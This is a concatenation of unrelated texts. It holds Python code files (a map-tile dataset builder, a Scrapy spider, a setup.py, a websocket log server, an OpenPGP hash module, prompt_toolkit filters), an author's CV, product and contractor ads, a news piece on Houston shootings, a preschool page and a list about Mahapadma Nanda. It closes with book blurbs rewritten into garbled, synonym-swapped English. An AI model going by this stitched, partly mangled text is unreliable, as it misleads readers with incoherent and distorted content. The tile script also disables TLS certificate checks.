        path_format = path_format.replace('{z}', str(zoom_level))
        path_format = path_format.replace('{x}', str(i))
        path_format = path_format.replace('{y}', str(j))
        input_image_path = os.path.join(req_target['path'], path_format)
        if os.path.isfile(input_image_path):
            input_img_p = Image.open(input_image_path)
            input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE))
        else:
            print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
            error_flg = 1
            return input_img_p, error_flg
    else:
        if req_target['type'] == 'tile':
            url_format = req_target['format']
            url_format = url_format.replace('{z}', str(zoom_level))
            url_format = url_format.replace('{x}', str(i))
            url_format = url_format.replace('{y}', str(j))
            input_image_url = req_target['url'] + url_format
        elif req_target['type'] == 'wms':
            # The WMS bounding box is built from this tile's corner and the
            # diagonally adjacent tile's corner in lon/lat.
            start_point = tile2latlon(i, j, zoom_level)
            end_point = tile2latlon(i + 1, j + 1, zoom_level)
            url_format = req_target['format']
            url_format = url_format.replace('{minx}', str(end_point[1]))
            url_format = url_format.replace('{miny}', str(start_point[0]))
            url_format = url_format.replace('{maxx}', str(start_point[1]))
            url_format = url_format.replace('{maxy}', str(end_point[0]))
            # NOTE(review): duplicate of the line above -- this second
            # replace is a no-op because '{maxy}' has already been replaced.
            url_format = url_format.replace('{maxy}', str(end_point[0]))
            url_format = url_format.replace('{output_width}', str(TILE_SIZE))
            url_format = url_format.replace('{output_height}', str(TILE_SIZE))
            input_image_url = req_target['url'] + url_format
        # NOTE(review): any other 'type' value leaves input_image_url
        # unbound and raises NameError on the next line.
        print 'input : ' + input_image_url
        res = requests.get(input_image_url, verify=False)
        if res.status_code == 200:
            # Reject non-image responses (e.g. HTML error pages served
            # with status 200).
            content_type = res.headers["content-type"]
            if 'image' not in content_type:
                print("Not image URL : %d - %d - %d" % (zoom_level, i, j))
                error_flg = 1
                return input_img_p, error_flg
            resfile = StringIO(res.content)
            input_img_p = Image.open(resfile)
            input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE))
        else:
            print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
            error_flg = 1
            return input_img_p, error_flg
    return input_img_p, error_flg

def dataset_make(images_x_start, images_x_end, images_y_start, images_y_end, zoom_level, imgs_num):
    """Fetch one tile neighbourhood and write it out as a TFRecord file.

    Downloads the target tile (when TARGET_URL is set) and every input tile
    for each (x, y) in the given inclusive ranges, pastes them onto local
    canvases, converts the stacked input channels to [-1, 1] floats, and
    writes one record (height/width/channel counts plus the raw input and
    target byte buffers) named after imgs_num and the tile coordinates.

    Returns (input images, target image, error_flg); on any tile failure it
    returns early with error_flg == 1 and writes nothing.
    """
    dataset_size_x = TILE_SIZE * (images_x_end - images_x_start + 1)
    dataset_size_y = TILE_SIZE * (images_y_end - images_y_start + 1)
    dataset_input_img = []
    for i in range(input_img_num):
        dataset_input_img.append(Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0)))
    dataset_target_img = Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0))
    error_flg = 0
    for i in range(images_x_start, images_x_end + 1):
        for j in range(images_y_start, images_y_end + 1):
            if not TARGET_URL == None:
                input_img_p, error_flg = getTile(TARGET_URL, i, j, zoom_level)
                if error_flg == 1:
                    print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
                    return dataset_input_img, dataset_target_img, error_flg
                else:
                    dataset_target_img.paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE))
            for k, req_target in enumerate(INPUT_URL):
                input_img_p, error_flg = getTile(req_target, i, j, zoom_level)
                if error_flg == 1:
                    print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
                    return dataset_input_img, dataset_target_img, error_flg
                else:
                    dataset_input_img[k].paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE))
            print("Get tile : %d - %d - %d" % (zoom_level, i, j))
    if error_flg == 0:
        # Total channel count across all input images (RGBA => 4 each).
        input_chNum = 0
        for tmpimg in dataset_input_img:
            input_chNum += np.asarray(tmpimg).shape[2]
        print ('input channel : ' + str(input_chNum))
        print ('target channel : ' + str(np.asarray(dataset_target_img).shape[2]))
        # Stack every input image's channels along the last axis.
        input_img_np = np.zeros((dataset_size_y, dataset_size_x, input_chNum))
        input_chNum = 0
        for i, tmpimg in enumerate(dataset_input_img):
            tmpimg_np = np.asarray(tmpimg)
            for j in range(tmpimg_np.shape[2]):
                input_img_np[:, :, input_chNum] = tmpimg_np[:, :, j]
                input_chNum += 1
        # Scale uint8 pixel values [0, 255] to floats in [-1, 1].
        input_array_np = input_img_np/127.5 - 1.0
        input_array_np_row = input_array_np.tostring()
        dataset_target_img_row = np.array(dataset_target_img).tostring()
        # One record per file: <imgs_num>_<x>_<y>_<zoom>.tfrecords.
        writer = tf.python_io.TFRecordWriter(os.path.join(OUTPUT_PATH, str(imgs_num) + '_' + str(images_x_start + int(kernel_size / 2)) + '_' + str(images_y_start + int(kernel_size / 2)) + '_' + str(zoom_level) + '.tfrecords'))
        example = tf.train.Example(features=tf.train.Features(feature={
            'height': _int64_feature(dataset_size_y),
            'width': _int64_feature(dataset_size_x),
            'input_ch': _int64_feature(input_array_np.shape[2]),
            'target_ch': _int64_feature(np.array(dataset_target_img).shape[2]),
            'input_raw': _bytes_feature(input_array_np_row),
            'target_raw': _bytes_feature(dataset_target_img_row)}))
        writer.write(example.SerializeToString())
        writer.close()
    return dataset_input_img, dataset_target_img, error_flg

# Main driver: one dataset_make() call per tile in the requested range
# (kernel_size == 1 makes each neighbourhood a single tile), then save the
# stitched preview images.  imgs_num only advances on success, so failed
# tiles do not consume record numbers.
imgs_num = 1
for i in range(args.images_x_start, args.images_x_end + 1):
    for j in range(args.images_y_start, args.images_y_end + 1):
        print "----- input : " + str(imgs_num) + " : " + str(args.zoom_level) + "-" + str(i) + "-" + str(j) + " -----"
        input_img_p, target_img_p, error_flg = dataset_make(i - int(kernel_size / 2), i - int(kernel_size / 2) + kernel_size - 1, j - int(kernel_size / 2), j - int(kernel_size / 2) + kernel_size - 1, args.zoom_level, imgs_num)
        for k in range(input_img_num):
            input_img[k].paste(input_img_p[k], ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE))
        target_img.paste(target_img_p, ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE))
        if error_flg == 0:
            imgs_num += 1
for i in range(input_img_num):
    input_img[i].save("input_image%d.png" %(i))
target_img.save("target_image.png" )
print "Make Images : " + str(imgs_num - 1)
Diploma, Children Literature, 1985, workshop funded by the government of Kuwait, Nicosia - Cyprus. Diploma (Associate of Arts), Advertising Design, 1975, Beirut University College (currently Lebanese American University), Lebanon. Bachelor degree, Social Work, 1955, Beirut College for Women (currently Lebanese American University), Lebanon. Commissioned Writer (32 articles about international writers, artists, and musicians), 2001 - 2003, Al-Arabi Assaghir magazine (Kuwait). Commissioned Writer (26 stories for the television program "Tuti Kuty"), 1995, Tele Liban. Writer, Literary Consultant, and Critic, 1994 - 1996, Atfal magazine. Writer of Stories and Articles, 1994 - 1996, Hazar magazine. Member of the Union of Arab Writers, 1996 - present. Member of the Union of Lebanese Writers, 1996 - present. Active member of the International Board on Books for Young People (IBBY), Lebanese branch (LBBY), 1985 - present. Tabbara Hammoud, N. (2004). Whispers by an Oriental Woman [Novel for adults]. Beirut: Dar wa Maktabat al-Maaref. Tabbara Hammoud, N. (2001). The Third Face of Love [Novel for adults]. Beirut: Dar al-Farabi. Tabbara Hammoud, N. (1996). Suhd and Zilal [Novel for adults]. Beirut: Dar al-Jadid. Tabbara Hammoud, N. (1992). Spring Without Roses [collection of short stories for adults]. Beirut: Dar al-Turath al-Arabi. Author of the Reading Hymn, 2010. - Rooster of the Feast, presented at Gulbenkian Theater at the Lebanese American University, 1992. - The Phantom of the Forest, presented at different schools in Lebanon, 1993. Author of many novels for teenagers (9 to 14 years) and children stories (5 to 7 years and 4 to 6 years). Producing many paintings and displaying them in solo and group exhibits. Abdul Hamid Shuman Prize for Children Literature award for excellence in novel writing for youth and children, 2007. Best Production Award by the Union of Publishers, Beirut International Book Fair, 2005. Arab Child Story Prize, Abu Dhabi, 1999.
Best Creation Award by the Union of Publishers, Beirut Book Fair, 1999. Listed on the IBBY Honour List for Excellence in Story Writing and speaker on behalf of 100 writers of children stories and artists listed on the honor's list, New Delhi IBBY conference, 1998.
# -*- coding: utf-8 -*-
import scrapy
import json

from locations.items import GeojsonPointItem


class TheBarreCodeSpider(scrapy.Spider):
    """Scrape The Barre Code studio locations into GeojsonPointItem records."""
    name = "thebarrecode"
    allowed_domains = ["thebarrecode.com"]
    start_urls = (
        'http://www.thebarrecode.com/',
    )

    def parse(self, response):
        """Follow every studio link on the landing page to its detail page."""
        for location_url in response.xpath('//h4[@class="studio-location-name"]/a[1]/@href').extract():
            yield scrapy.Request(
                location_url,
                callback=self.parse_location,
            )

    def parse_location(self, response):
        """Extract one studio's address/contact details and emit an item."""
        # extract_first() returns None when a node is missing; guard the city
        # before stripping its trailing ", " separator so a page without a
        # city span no longer raises AttributeError.
        city = response.xpath('//h4[@class="studio-address"]/span[@class="city"]/text()').extract_first()

        properties = {
            'addr_full': response.xpath('//h4[@class="studio-address"]/span[@class="street"]/text()').extract_first(),
            'city': city.replace(', ', '') if city else None,
            'state': response.xpath('//h4[@class="studio-address"]/span[@class="state"]/text()').extract_first(),
            'postcode': response.xpath('//h4[@class="studio-address"]/text()').extract_first(),
            'phone': response.xpath('//h4[@class="studio-phone"]/text()').extract_first(),
            'name': response.xpath('//h3[@class="studio-location-name"]/text()').extract_first(),
            # The detail-page URL doubles as a stable unique reference.
            'ref': response.url,
            'website': response.url,
        }

        # Trim surrounding whitespace on every scraped string field.
        for key in properties:
            if properties[key] and isinstance(properties[key], str):
                properties[key] = properties[key].strip()

        # Coordinates come from the map-marker div's data attributes.
        lat = response.xpath('//div[@class="marker"]/@data-lat').extract_first()
        if lat:
            lat = float(lat)
            properties['lat'] = lat

        lon = response.xpath('//div[@class="marker"]/@data-lng').extract_first()
        if lon:
            lon = float(lon)
            properties['lon'] = lon

        yield GeojsonPointItem(**properties)
The ergonomic design provides comfortable wear over long periods and fits securely in your ears. These Moloke 56S earphones adopt Bluetooth 4.1 technology, allowing stable wireless connectivity with a range of Bluetooth-enabled devices such as phones, tablets and more. The ergonomic design provides comfortable wear over long periods and fits securely in your ears. Suitable for various occasions, especially sports. Adopts Bluetooth 4.1 technology to ensure faster pairing speed and stable connectivity. Compatible with most Bluetooth-enabled devices. The high-definition microphone ensures stable and clear hands-free talking while you exercise or drive — safe and convenient. The soft ear-hook design ensures your earphones hold firm as you sprint, jump, and flip through your workout. The built-in 70mAh battery provides up to 6 hours of music listening time when fully charged, great for meeting your daily demands. Thanks to the waterproof design, the earphones are well protected from sweat, splashes and rain. Made of flexible silicone material, they fit your ears comfortably. Perfect for sports occasions.
import codecs
import os
import subprocess

from setuptools import setup, find_packages

# Directory containing this setup script; used to locate README.md and
# favesdump.py regardless of the current working directory.
LOCAL_PATH = os.path.dirname(os.path.abspath(__file__))


def get_desc():
    """Get long description by converting README file to reStructuredText.

    Falls back to the raw Markdown text when pandoc fails, and to an empty
    string when the README is missing entirely.
    """
    file_name = os.path.join(LOCAL_PATH, 'README.md')
    if not os.path.exists(file_name):
        return ''
    try:
        cmd = "pandoc --from=markdown --to=rst %s" % file_name
        stdout = subprocess.STDOUT
        output = subprocess.check_output(cmd, shell=True, stderr=stdout)
        return output.decode('utf-8')
    except subprocess.CalledProcessError:
        print('pandoc is required for package distribution but not installed')
        # Use a context manager so the file handle is closed deterministically
        # (the original leaked it).
        with codecs.open(file_name, mode='r', encoding='utf-8') as readme:
            return readme.read()


def get_version():
    """Extract __version__ from favesdump.py without importing the module.

    Returns None if no __version__ assignment is found.
    """
    with codecs.open(os.path.join(LOCAL_PATH, 'favesdump.py'), 'r') as f:
        for line in f:
            if line.startswith('__version__ ='):
                # Strip quotes, spaces AND the trailing newline: the original
                # strip(' \'"') left "\n" (and the quote before it) attached
                # to the returned version string.
                return line.split('=')[1].strip(' \'"\n')


setup(
    name='favesdump',
    description='last.fm faves dumper.',
    version=get_version(),
    license='MIT',
    author='Alex Musayev',
    author_email='alex.musayev@gmail.com',
    url='https://github.com/dreikanter/favesdump',
    long_description=get_desc(),
    platforms=['any'],
    packages=find_packages(),
    install_requires=[
        'pyyaml',
        'requests',
    ],
    entry_points={'console_scripts': ['favesdump = favesdump:main']},
    zip_safe=True,
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Topic :: System :: Archiving :: Backup',
        'Topic :: Utilities',
    ],
    dependency_links=[],
)
Wood windows offer style and energy efficiency to make your house feel like a home. There are countless options available when upgrading the windows in your home, but nothing compares to the warmth and beauty of traditional wood windows. At Tight Line Exteriors, we know that investing in new Atlanta wood windows is a big decision, and we’ll be with you every step of the way to ensure decades of home value and enjoyment. Free, in-home estimates with no hidden fees! For energy-efficient replacement windows in Atlanta, Alpharetta, Roswell, and beyond, there’s nobody more trusted than the pros at Tight Line Exteriors! To get more information on our selection of stunning wood windows, contact our team today. Just give us a call or fill out our online form, and we’ll help you get set up with a free, no-obligation estimate at a time that suits your busy schedule.
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # import sys, string, os, time import asyncio import websockets import subprocess import socket FILE = "/tmp/app.log" def notify_launcher(str): # Create a socket (SOCK_STREAM means a TCP socket) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # Connect to server and send data sock.connect(("localhost", 9000)) sock.sendall(bytes(str + "\n", "UTF-8")) except socket.error as msg: pass finally: sock.close() def htmlize(s): s = s.replace("&", "&amp;") s = s.replace("<", "&lt;") s = s.replace(">", "&gt;") s = s.replace("\n", "<br/>") return s @asyncio.coroutine def handler(websocket, path): with open(FILE, 'r') as fin: line = fin.readline() while(websocket.open): if line: yield from websocket.send(htmlize(line)) else: yield from asyncio.sleep(0.01) line = fin.readline() asyncio.get_event_loop().stop() if os.fork(): sys.exit(0) time.sleep(1) os.setsid() # request log file creation from launcher notify_launcher("logging-start") # this is the server process which reads the file, monitors # it for new contents and forwards it to the client loop = asyncio.get_event_loop() start_server = websockets.serve(handler, "", 8999) websocket_server = loop.run_until_complete(start_server) try: loop.run_forever() finally: websocket_server.close() loop.run_until_complete(websocket_server.wait_closed()) notify_launcher("logging-stop")
In the three-and-a-half months since Trayvon Martin was killed, Houston courts have heard two cases involving the shooting of unarmed civilians and decided them very differently. Last night, a Harris County jury found Raul Rodriguez guilty of murder for shooting his neighbor in 2010 over a noisy party. Kelly Danaher, a 36-year-old elementary school teacher, was having a birthday party for his wife and young daughter. Angry about the noise, Rodriguez armed himself with a handgun and video camera and recorded himself telling a police dispatcher, “my life is in danger now,” “these people are going to try and kill me,” and “I’m standing my ground here.” Rodriguez fatally shot Danaher in the street after someone tried to grab his video camera. Dateline Houston wishes this were a depressing postmodern play about the dangerous, aggrandizing fantasies engendered by constant self-documentation in the social media age—but it’s not. It’s a real news story about a retired firefighter with a concealed carry permit and the Stand Your Ground law that made him think that saying aloud that he believed his life was in danger would protect him from all consequences. The problem is, Rodriguez wasn’t a cop. In April, a federal judge dismissed a lawsuit against two Houston-area cops who shot an unarmed black man, Robbie Tolan, in his driveway in 2008. Here’s what happened—and please note, these events are not disputed; the issue at stake in the lawsuit was whether these events violated Tolan’s constitutional rights. Tolan and his cousin were driving home in the wee hours of December 31. Officer John C. Edwards (who is white) was on patrol in the Bellaire neighborhood and ran Cooper’s plates—you know, just because. The plates came back as stolen—because Edwards had entered the plate number wrong. Cotton, the sergeant who shot Tolan, was charged with first-degree aggravated assault by a public servant and found not guilty at trial in 2010. Naturally. Then the Tolan family sued. They lost.
#!/usr/bin/env python3
import hashlib

from .compat import OrderedDict, bytearray_or_str
from .length import Length


def decode_hash_algorithm(octet):
    """Return the HashAlgorithm subclass for a one-octet RFC 4880 id.

    Raises:
        TypeError: if `octet` is not an int in the range [0, 256).
        ValueError: if the octet does not name a known hash algorithm.
    """
    if not isinstance(octet, int) or not 0 <= octet < 256:
        raise TypeError('Bad octet value: `{0}` of type `{1}`'.format(
            octet, type(octet)))
    try:
        return BYTE_TO_HASH[octet]
    except KeyError:
        # Suppress the KeyError context (`from None`): the ValueError alone
        # carries all the information a caller needs.
        raise ValueError(
            'Unknown hash algorithm `{0}`. See '
            'http://tools.ietf.org/html/rfc4880#section-9.4'.format(
                octet)) from None


class HashAlgorithm():
    """
    9.4. Hash Algorithms

    http://tools.ietf.org/html/rfc4880#section-9.4

    Abstract base: subclasses provide `length` and `hash_constructor`.
    """

    def __init__(self):
        raise RuntimeError('HashAlgorithm should not be instantiated')

    @classmethod
    def new(cls):
        # A fresh hash object, wrapped so update() accepts str/bytearray.
        return HashWrapper(cls.hash_constructor())

    @classmethod
    def serialize(cls):
        """Return an ordered description of this algorithm."""
        return OrderedDict([
            ('name', cls.__name__),
            ('octet_value', HASH_TO_BYTE[cls]),
            ('digest_length', cls.length),
        ])


class HashWrapper():
    """Thin adapter around a hashlib object normalizing inputs and outputs."""

    def __init__(self, hash_instance):
        self._h = hash_instance

    def update(self, data):
        return self._h.update(bytearray_or_str(data))

    def digest(self):
        # Return a mutable bytearray rather than bytes.
        return bytearray(self._h.digest())

    def hexdigest(self):
        return self._h.hexdigest()


class MD5(HashAlgorithm):
    length = Length(bits=128)  # 16 octets
    hash_constructor = hashlib.md5


class SHA1(HashAlgorithm):
    length = Length(bits=160)  # 20 octets
    hash_constructor = hashlib.sha1


class RIPEMD160(HashAlgorithm):
    length = Length(bits=160)  # 20 octets

    @staticmethod
    def hash_constructor():
        # ripemd160 has no direct hashlib constructor; go through new().
        return hashlib.new('ripemd160')


class SHA256(HashAlgorithm):
    length = Length(bits=256)  # 32 octets
    hash_constructor = hashlib.sha256


class SHA384(HashAlgorithm):
    length = Length(bits=384)  # 48 octets
    hash_constructor = hashlib.sha384


class SHA512(HashAlgorithm):
    length = Length(bits=512)  # 64 octets
    hash_constructor = hashlib.sha512


class SHA224(HashAlgorithm):
    length = Length(bits=224)  # 28 octets
    hash_constructor = hashlib.sha224


# Octet identifiers from RFC 4880 section 9.4.
BYTE_TO_HASH = {
    1: MD5,
    2: SHA1,
    3: RIPEMD160,
    8: SHA256,
    9: SHA384,
    10: SHA512,
    11: SHA224,
}

# Inverse mapping, built with a dict comprehension instead of the original
# list-of-pairs round trip.
HASH_TO_BYTE = {algorithm: octet for octet, algorithm in BYTE_TO_HASH.items()}
Welcome to Little Spuds Preschool! Shelby Hansen is a wife and mother to two precious kids who are full of life and lots of energy. She has been teaching preschool since the 2012 school year. She is a certified teacher and has a Bachelor of Arts in Elementary Education from Brigham Young University. Mallory Soren has a Bachelor of Science in Early Childhood Special Education. She worked as a special-needs preschool teacher for 5 years. She has a passion for working with young children. She is a wife and mother to two young boys. She loves to spend time hiking and camping with her family. Sallee Hansen is a wife and mother of 3 kids. Sallee is from Mesa, AZ. Her family moved to Idaho in 2014 and took over ownership of the preschool in 2016. She helps in class when needed and substitutes when a teacher is out. Fill out this form and we will contact you later!
""" Filters that accept a `CommandLineInterface` as argument. """ from __future__ import unicode_literals from .base import Filter from prompt_toolkit.enums import EditingMode from prompt_toolkit.key_binding.vi_state import InputMode as ViInputMode from prompt_toolkit.cache import memoized __all__ = ( 'HasArg', 'HasCompletions', 'HasFocus', 'InFocusStack', 'HasSearch', 'HasSelection', 'HasValidationError', 'IsAborting', 'IsDone', 'IsMultiline', 'IsReadOnly', 'IsReturning', 'RendererHeightIsKnown', 'InEditingMode', # Vi modes. 'ViMode', 'ViNavigationMode', 'ViInsertMode', 'ViInsertMultipleMode', 'ViReplaceMode', 'ViSelectionMode', 'ViWaitingForTextObjectMode', 'ViDigraphMode', # Emacs modes. 'EmacsMode', 'EmacsInsertMode', 'EmacsSelectionMode', ) @memoized() class HasFocus(Filter): """ Enable when this buffer has the focus. """ def __init__(self, buffer_name): self._buffer_name = buffer_name @property def buffer_name(self): " The given buffer name. (Read-only) " return self._buffer_name def __call__(self, cli): return cli.current_buffer_name == self.buffer_name def __repr__(self): return 'HasFocus(%r)' % self.buffer_name @memoized() class InFocusStack(Filter): """ Enable when this buffer appears on the focus stack. """ def __init__(self, buffer_name): self._buffer_name = buffer_name @property def buffer_name(self): " The given buffer name. (Read-only) " return self._buffer_name def __call__(self, cli): return self.buffer_name in cli.buffers.focus_stack def __repr__(self): return 'InFocusStack(%r)' % self.buffer_name @memoized() class HasSelection(Filter): """ Enable when the current buffer has a selection. """ def __call__(self, cli): return bool(cli.current_buffer.selection_state) def __repr__(self): return 'HasSelection()' @memoized() class HasCompletions(Filter): """ Enable when the current buffer has completions. 
""" def __call__(self, cli): return cli.current_buffer.complete_state is not None def __repr__(self): return 'HasCompletions()' @memoized() class IsMultiline(Filter): """ Enable in multiline mode. """ def __call__(self, cli): return cli.current_buffer.is_multiline() def __repr__(self): return 'IsMultiline()' @memoized() class IsReadOnly(Filter): """ True when the current buffer is read only. """ def __call__(self, cli): return cli.current_buffer.read_only() def __repr__(self): return 'IsReadOnly()' @memoized() class HasValidationError(Filter): """ Current buffer has validation error. """ def __call__(self, cli): return cli.current_buffer.validation_error is not None def __repr__(self): return 'HasValidationError()' @memoized() class HasArg(Filter): """ Enable when the input processor has an 'arg'. """ def __call__(self, cli): return cli.input_processor.arg is not None def __repr__(self): return 'HasArg()' @memoized() class HasSearch(Filter): """ Incremental search is active. """ def __call__(self, cli): return cli.is_searching def __repr__(self): return 'HasSearch()' @memoized() class IsReturning(Filter): """ When a return value has been set. """ def __call__(self, cli): return cli.is_returning def __repr__(self): return 'IsReturning()' @memoized() class IsAborting(Filter): """ True when aborting. (E.g. Control-C pressed.) """ def __call__(self, cli): return cli.is_aborting def __repr__(self): return 'IsAborting()' @memoized() class IsExiting(Filter): """ True when exiting. (E.g. Control-D pressed.) """ def __call__(self, cli): return cli.is_exiting def __repr__(self): return 'IsExiting()' @memoized() class IsDone(Filter): """ True when the CLI is returning, aborting or exiting. """ def __call__(self, cli): return cli.is_done def __repr__(self): return 'IsDone()' @memoized() class RendererHeightIsKnown(Filter): """ Only True when the renderer knows it's real height. 
(On VT100 terminals, we have to wait for a CPR response, before we can be sure of the available height between the cursor position and the bottom of the terminal. And usually it's nicer to wait with drawing bottom toolbars until we receive the height, in order to avoid flickering -- first drawing somewhere in the middle, and then again at the bottom.) """ def __call__(self, cli): return cli.renderer.height_is_known def __repr__(self): return 'RendererHeightIsKnown()' @memoized() class InEditingMode(Filter): """ Check whether a given editing mode is active. (Vi or Emacs.) """ def __init__(self, editing_mode): self._editing_mode = editing_mode @property def editing_mode(self): " The given editing mode. (Read-only) " return self._editing_mode def __call__(self, cli): return cli.editing_mode == self.editing_mode def __repr__(self): return 'InEditingMode(%r)' % (self.editing_mode, ) @memoized() class ViMode(Filter): def __call__(self, cli): return cli.editing_mode == EditingMode.VI def __repr__(self): return 'ViMode()' @memoized() class ViNavigationMode(Filter): """ Active when the set for Vi navigation key bindings are active. 
""" def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state): return False return (cli.vi_state.input_mode == ViInputMode.NAVIGATION or cli.current_buffer.read_only()) def __repr__(self): return 'ViNavigationMode()' @memoized() class ViInsertMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return cli.vi_state.input_mode == ViInputMode.INSERT def __repr__(self): return 'ViInputMode()' @memoized() class ViInsertMultipleMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return cli.vi_state.input_mode == ViInputMode.INSERT_MULTIPLE def __repr__(self): return 'ViInsertMultipleMode()' @memoized() class ViReplaceMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return cli.vi_state.input_mode == ViInputMode.REPLACE def __repr__(self): return 'ViReplaceMode()' @memoized() class ViSelectionMode(Filter): def __call__(self, cli): if cli.editing_mode != EditingMode.VI: return False return bool(cli.current_buffer.selection_state) def __repr__(self): return 'ViSelectionMode()' @memoized() class ViWaitingForTextObjectMode(Filter): def __call__(self, cli): if cli.editing_mode != EditingMode.VI: return False return cli.vi_state.operator_func is not None def __repr__(self): return 'ViWaitingForTextObjectMode()' @memoized() class ViDigraphMode(Filter): def __call__(self, cli): if cli.editing_mode != EditingMode.VI: return False return 
cli.vi_state.waiting_for_digraph def __repr__(self): return 'ViDigraphMode()' @memoized() class EmacsMode(Filter): " When the Emacs bindings are active. " def __call__(self, cli): return cli.editing_mode == EditingMode.EMACS def __repr__(self): return 'EmacsMode()' @memoized() class EmacsInsertMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.EMACS or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return True def __repr__(self): return 'EmacsInsertMode()' @memoized() class EmacsSelectionMode(Filter): def __call__(self, cli): return (cli.editing_mode == EditingMode.EMACS and cli.current_buffer.selection_state) def __repr__(self): return 'EmacsSelectionMode()'
1. Mahapadma Nanda (450–362 BCE) was the first king of the Nanda dynasty. 2. He was the son of Mahanandin, a Yadav king of the Shishunaga dynasty. 3. Sons of Mahanandin from his other wives opposed the rise of Mahapadma Nanda, so he eliminated all of them to claim the throne. 4. The Nandas, under Mahapadma Nanda, established the first great North Indian empire with its political centre in Magadha, which would in the following years lead to the largest empire in ancient India, to be built by the Mauryas. 5. Mahapadma Nanda vanquished the old dynasties of the North, not, as was customary, to extract tribute from them and to be recognized as the most powerful—the samrat or the chakravartin—but rather in order to dethrone them and declare himself an "ekachhatra", the only emperor in the entire land. 6. The collapse of the old Kshatriya dynasties under the rigorous power politics of Mahapadma Nanda led to him being known as "The Destroyer of Kshatriyas". 7. He died at 88 years old. 8. His kingdom annexed parts of Kalinga, central India, Anga, and the upper Ganges Valley.
from util.rectangle import Rectangle


class Area(object):
    """
    A navigation area.

    An axis-aligned rectangle inside which movement is freely possible.
    Connections to other navigation areas make pathfinding across a map
    possible.
    """

    __slots__ = (
        'rect', 'z', 'sector', 'flags', 'plane', 'connections', 'elements',
        'inside_rect', 'index', 'path', 'visited'
    )

    # Side identifiers of a navigation area.
    SIDE_TOP = 0
    SIDE_RIGHT = 1
    SIDE_BOTTOM = 2
    SIDE_LEFT = 3
    SIDE_RANGE = [SIDE_TOP, SIDE_RIGHT, SIDE_BOTTOM, SIDE_LEFT]
    SIDE_RANGE_OPPOSITE = [SIDE_BOTTOM, SIDE_LEFT, SIDE_TOP, SIDE_RIGHT]

    def __init__(self, x1, y1, x2, y2, z):
        # Bounding rectangle of this area.
        self.rect = Rectangle(x1, y1, x2, y2)

        # Average Z of this area; not meaningful when the area has a slope.
        self.z = z

        # Optional sector index this area is linked to. When that sector's
        # floor or ceiling moves, the area must be updated along with it.
        self.sector = None

        # Flags taken over from a NavElement object.
        self.flags = 0

        # Plane describing this area's surface.
        self.plane = None

        # Connection objects leading into other navigation areas.
        self.connections = []

        # Internal bookkeeping of elements belonging to this area.
        self.elements = []
        self.inside_rect = Rectangle()
        self.index = -1
        self.path = False
        self.visited = False

    def get_side(self, side):
        """
        Return the (x1, y1, x2, y2) start and end coordinates of one side
        of this area, or None when *side* is not a known side constant.
        """
        bounds = self.rect
        edges = {
            Area.SIDE_TOP: (bounds.left, bounds.top, bounds.right, bounds.top),
            Area.SIDE_RIGHT: (bounds.right, bounds.top, bounds.right, bounds.bottom),
            Area.SIDE_BOTTOM: (bounds.left, bounds.bottom, bounds.right, bounds.bottom),
            Area.SIDE_LEFT: (bounds.left, bounds.top, bounds.left, bounds.bottom),
        }
        return edges.get(side)

    def __repr__(self):
        return 'area {}, z {}, sector {}, width {}, height {}, plane {}, flags {}, connections {}'.format(
            self.rect, self.z, self.sector, self.rect.get_width(),
            self.rect.get_height(), self.plane, self.flags,
            len(self.connections))
Morgenthau seeks to strengthen a accomplished idea of overseas politics, which he phrases political realism. not like idealism (which assumes the “essential goodness and endless malleability of human nature and the power of politics to dwell as much as ethical standards), realism assumes that the realm consists of opposing pursuits and clash between them is inevitable. Realism is essentially desirous about energy instead of morality or fabric pursuits. Morgenthau comprises robust assumptions approximately human nature – people usually are not evidently stable and clash is the traditional consequence of the hunt for strength, no longer of confusion. The impact of Aristotle, the prince of philosophers, at the highbrow heritage of the West is moment to none. during this e-book, Jonathan Barnes examines Aristotle's medical researches, his discoveries in good judgment and his metaphysical theories, his paintings in psychology and in ethics and politics, and his principles approximately paintings and poetry, putting his teachings of their historic context. In a capitalist economic climate, taxes are crucial device during which the political procedure places into perform a notion of monetary and distributive justice. Taxes arouse robust passions, fueled not just by means of conflicts of financial self-interest, yet by way of conflicting rules of equity. Taking as a tenet the traditional nature of personal estate, Murphy and Nagel exhibit how taxes can in basic terms be evaluated as a part of the final process of estate rights that they assist to create. The Philosophy of Sociality examines the character of sociality in its quite a few kinds, with targeted emphasis on collective intentionality. Raimo Tuomela starts off with a contrast among the "we-perspective" and the "I-perspective. 
